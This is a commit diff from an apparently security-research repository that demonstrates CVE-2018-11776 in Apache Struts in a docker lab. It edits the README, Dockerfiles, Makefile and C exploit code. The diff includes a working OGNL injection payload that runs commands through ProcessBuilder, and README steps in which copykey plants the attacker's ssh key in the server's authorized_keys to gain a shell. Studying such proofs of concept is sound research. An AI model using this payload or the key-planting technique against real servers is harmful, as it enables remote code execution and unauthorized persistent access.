Enable popping a calculator from inside docker.

Author: kevinbackhouse

Apache/Struts/CVE-2018-11776/README.md

@@ -22,13 +22,13 @@ Build the docker image:
 
 ```
 cd struts-server
-docker build . -t struts-server
+docker build . -t struts-server --build-arg UID=`id -u`
 ```
 
 Start the container:
 
 ```
-docker run --rm --network struts-demo-network --ip=172.16.0.10 -h struts-server --publish 8080:8080 -i -t struts-server
+docker run --rm --network struts-demo-network --ip=172.16.0.10 -h struts-server --publish 8080:8080 -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -i -t struts-server
 ```
 
 Inside the container, start Struts and sshd. The reason for starting sshd is that we are going to use it to get a shell on the Struts server. We think it is realistic for sshd to be running because it is very widely used by system administrators for remote access.
@@ -55,12 +55,17 @@ Start the container:
 docker run --rm --network struts-demo-network --ip=172.16.0.11 -h struts-attacker -i -t struts-attacker
 ```
 
-Inside the container, build `copykey.c` and use it to copy the attacker's ssh key into the server's `authorized_keys` file. Then use `ssh` to login.
+Inside the container, use `copykey` to copy the attacker's ssh key into the server's `authorized_keys` file. Then use `ssh` to login.
 
 ```
-gcc copykey.c utils.c -o copykey
-./copykey http://172.16.0.10:8080/struts2-showcase
+./src/copykey http://172.16.0.10:8080/struts2-showcase
 ssh victim@172.16.0.10
 ```
 
 We have a shell!
+
+Alternatively, you can start a calculator like this:
+
+```
+./src/startcalc http://172.16.0.10:8080/struts2-showcase
+```

Apache/Struts/CVE-2018-11776/struts-attacker/Dockerfile

@@ -1,18 +1,19 @@
 FROM ubuntu:bionic
 
 RUN apt-get update && \
-    apt-get install -y curl tmux emacs net-tools gcc ssh
+    apt-get install -y curl tmux emacs net-tools gcc ssh build-essential
 
 # Create user account for the attacker.
 RUN adduser attacker --disabled-password
 
 # Copy the exploit PoC into the attacker's home directory.
-COPY copykey.c /home/attacker/copykey.c
-RUN chown attacker:attacker /home/attacker/copykey.c
+COPY src /home/attacker/src
+RUN chown -R attacker:attacker /home/attacker/src
 
 # Switch over to the 'attacker' user, since root access is no longer required
 USER attacker
 WORKDIR /home/attacker
+RUN cd src && make
 
 # Create an ssh key for the attacker.
 RUN ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -q -P ""

Apache/Struts/CVE-2018-11776/struts-attacker/src/Makefile

@@ -0,0 +1,19 @@
+all: copykey startcalc
+
+clean:
+	rm -f *.o copykey startcalc
+
+copykey: copykey.o utils.o
+	gcc -Wall copykey.o utils.o -o copykey
+
+startcalc: startcalc.o utils.o
+	gcc -Wall startcalc.o utils.o -o startcalc
+
+copykey.o: copykey.c utils.h
+	gcc -c copykey.c
+
+startcalc.o: startcalc.c utils.h
+	gcc -c startcalc.c
+
+utils.o: utils.c utils.h
+	gcc -c utils.c

…CVE-2018-11776/struts-attacker/copykey.c …2018-11776/struts-attacker/src/copykey.cApache/Struts/CVE-2018-11776/struts-attacker/copykey.c renamed to Apache/Struts/CVE-2018-11776/struts-attacker/src/copykey.c Apache/Struts/CVE-2018-11776/struts-attacker/copykey.c renamed to Apache/Struts/CVE-2018-11776/struts-attacker/src/copykey.c

@@ -6,12 +6,20 @@
 #include "utils.h"
 
 // NOTE:
-// This exploit will not work if Struts is running in a docker container,
-// because you cannot pop a calculator from inside docker. So this exploit
-// requires you to run Struts outside of docker. The easiest way to do this
-// is to follow the instructions in the README for building Struts in
-// docker. Then just copy the tomcat directory out of docker. To do that,
-// start docker like this:
+// This exploit will not normally work if Struts is running in a docker
+// container, because you cannot pop a calculator from inside docker. There
+// are two ways to solve this problem. The first solution is to pass the
+// following extra arguments on the `docker run` command line, to enable X
+// applications to run from within the container:
+//
+// ```
+// -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix
+// ```
+//
+// The second solution is to run Struts outside of docker. The easiest way
+// to do this is to follow the instructions in the README for building
+// Struts in docker. Then just copy the tomcat directory out of docker. To
+// do that, start docker like this:
 //
 // ```
 // docker run -v `pwd`:/home/victim/temp -i -t struts-server
@@ -57,7 +65,7 @@ int main(int argc, char* argv[]) {
     "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
     "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context."
     "setMemberAccess(#dm)).(#sl=@java.io.File@separator)."
-    "(#p=new java.lang.ProcessBuilder({'bash','-c','gnome-calculator'})).(#p.start())}";
+    "(#p=new java.lang.ProcessBuilder({'bash','-c','xcalc'})).(#p.start())}";
 
   // Escape any slash characters in the ssh key, to stop Tomcat from
   // intercepting them.

…E-2018-11776/struts-attacker/startcalc.c …18-11776/struts-attacker/src/startcalc.cApache/Struts/CVE-2018-11776/struts-attacker/startcalc.c renamed to Apache/Struts/CVE-2018-11776/struts-attacker/src/startcalc.c Apache/Struts/CVE-2018-11776/struts-attacker/startcalc.c renamed to Apache/Struts/CVE-2018-11776/struts-attacker/src/startcalc.c

@@ -3,10 +3,12 @@ FROM ubuntu:bionic
 RUN apt-get update && \
     apt-get install -y \
       openjdk-8-jdk git curl zip unzip \
-      tmux sudo emacs maven openssh-server net-tools
+      tmux sudo emacs maven openssh-server net-tools x11-apps
+
+ARG UID=1000
 
 # Create a non-root user account to run Struts.
-RUN adduser victim --disabled-password
+RUN adduser victim --disabled-password --uid $UID
 
 # Grant the 'victim' user sudo access, so that we can start sshd.
 RUN adduser victim sudo